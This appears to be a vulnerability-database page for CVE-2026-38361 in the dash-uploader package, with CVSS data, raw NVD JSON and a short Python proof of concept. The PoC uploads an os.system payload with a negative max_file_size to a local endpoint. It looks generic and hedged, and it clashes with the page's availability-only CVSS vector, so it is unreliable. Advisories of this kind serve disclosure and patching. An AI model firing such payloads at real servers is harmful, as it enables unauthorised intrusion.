Security Vulnerability Report
中文
CVE-2026-38361 CVSS 7.5 HIGH

CVE-2026-38361

Published: 2026-05-08 15:16:37
Last Modified: 2026-05-08 19:16:31
Source: [email protected]

Description

An issue in fohrloop dash-uploader v.0.1.0 through v.0.7.0a2 allows a remote attacker to execute arbitrary code via the dash_uploader/httprequesthandler.py, dash_uploader/upload.py in the Upload function and max_file_size parameter, dash_uploader/configure_upload.py components

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

fohrloop dash-uploader v0.1.0 至 v0.7.0a2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target URL (Example) target = "http://127.0.0.1:8050/_dash-uploader" # Malicious file to upload payload_content = "__import__('os').system('calc.exe')" files = { 'file': ('exploit.py', payload_content, 'application/octet-stream') } # Exploit the max_file_size parameter validation issue data = { 'max_file_size': -1, # Attempt to bypass size check 'uploadId': 'CVE-2026-38361-test' } try: response = requests.post(target, files=files, data=data) if response.status_code == 200: print("[+] Potential exploit successful, check server.") else: print(f"[-] Exploit failed with status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-38361", "sourceIdentifier": "[email protected]", "published": "2026-05-08T15:16:37.120", "lastModified": "2026-05-08T19:16:31.103", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in fohrloop dash-uploader v.0.1.0 through v.0.7.0a2 allows a remote attacker to execute arbitrary code via the dash_uploader/httprequesthandler.py, dash_uploader/upload.py in the Upload function and max_file_size parameter, dash_uploader/configure_upload.py components"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}, {"lang": "en", "value": "CWE-670"}]}], "references": [{"url": "https://docs.python.org/3/library/functions.html#all", "source": "[email protected]"}, {"url": "https://github.com/a1ohadance/CVE-2026-38361", "source": "[email protected]"}, {"url": "https://github.com/fohrloop/dash-uploader", "source": "[email protected]"}, {"url": "https://github.com/fohrloop/dash-uploader/blob/stable/dash_uploader/httprequesthandler.py", "source": "[email protected]"}, {"url": "https://github.com/fohrloop/dash-uploader/issues/153", "source": "[email protected]"}, {"url": "https://libraries.io/pypi/dash-uploader", "source": "[email protected]"}, {"url": "https://pepy.tech/project/dash-uploader", "source": "[email protected]"}, {"url": "https://pypi.org/project/dash-uploader/", "source": "[email protected]"}, {"url": "https://pypistats.org/packages/dash-uploader", "source": "[email protected]"}, {"url": "https://github.com/a1ohadance/CVE-2026-38361", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.